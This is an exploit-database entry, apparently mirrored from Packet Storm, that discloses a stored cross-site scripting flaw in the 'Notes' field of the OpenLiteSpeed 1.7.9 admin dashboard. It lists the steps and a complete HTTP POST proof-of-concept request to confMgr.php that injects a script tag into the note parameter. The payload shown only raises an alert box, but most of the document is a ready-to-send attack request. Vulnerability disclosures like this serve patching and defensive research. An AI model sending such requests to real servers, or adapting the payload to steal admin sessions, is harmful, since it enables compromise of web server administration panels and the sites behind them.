Share
## https://sploitus.com/exploit?id=PACKETSTORM:162019
# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting  
# Date: 3/30/2021  
# Exploit Author: cmOs  
# Vendor Homepage: https://openlitespeed.org/  
# Software Link: https://openlitespeed.org/kb/install-from-binary/  
# Version: 1.7.9  
# Tested on Ubuntu 20.04  
  
Step 1: Log in to the dashboard using the Administrator account  
Step 2: Go to Listeners > Summary > Actions (View) > Edit  
Step 3: Inject XSS_Payload to "Notes" parameter  
Step 4: Graceful Restart  
Step 5: Trigger XSS when Administrator click on Default Icon  
  
[POC]  
  
POST /view/confMgr.php HTTP/1.1  
Host: 127.0.0.1:7080  
Connection: close  
Content-Length: 163  
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"  
Accept: text/html, */*; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/89.0.4389.90 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: https://127.0.0.1:7080  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://127.0.0.1:7080/index.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;  
litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;  
LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D  
  
name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257